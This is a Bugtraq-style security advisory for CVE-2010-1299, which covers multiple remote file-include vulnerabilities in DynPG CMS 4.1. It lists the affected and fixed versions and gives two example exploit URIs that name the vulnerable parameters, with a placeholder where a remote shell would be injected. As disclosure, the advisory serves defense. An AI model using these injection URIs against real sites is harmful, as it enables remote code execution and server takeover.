DynPG CMS Multiple Remote File Include Vulnerabilities

Bugtraq ID:	39168
Class:	Input Validation Error
CVE:	CVE-2010-1299
Remote:	Yes
Local:	No
Published:	Apr 01 2010 12:00AM
Updated:	Apr 13 2015 09:02PM
Credit:	eidelweiss
Vulnerable:	Dynpg DynPG CMS 4.1
Not Vulnerable:	Dynpg DynPG CMS 4.2.0

DynPG CMS Multiple Remote File Include Vulnerabilities

DynPG CMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.

DynPG CMS 4.1.0 is vulnerable; prior versions may also be affected.

DynPG CMS Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/DynPG_path/plugins/DPGguestbook/guestbookaction.php?PathToRoot= [inject0r sh3ll]
http://www.example.com/DynPG_path/backendpopup/popup.php?get_popUpResource= [inj3ct0r sh3ll]

DynPG CMS Multiple Remote File Include Vulnerabilities

Solution:
An update is available to address this issue. Please see the references for more information.

DynPG CMS Multiple Remote File Include Vulnerabilities

References:

• DynPG CMS Homepage (Dynpg)
  
• DynPG-Update 4.1.1 noch einfacher und sicherer! (DynPG)
  
• DynPG CMS v4.1.0 Multiple Remote File Inclusion Vulnerability ([email protected])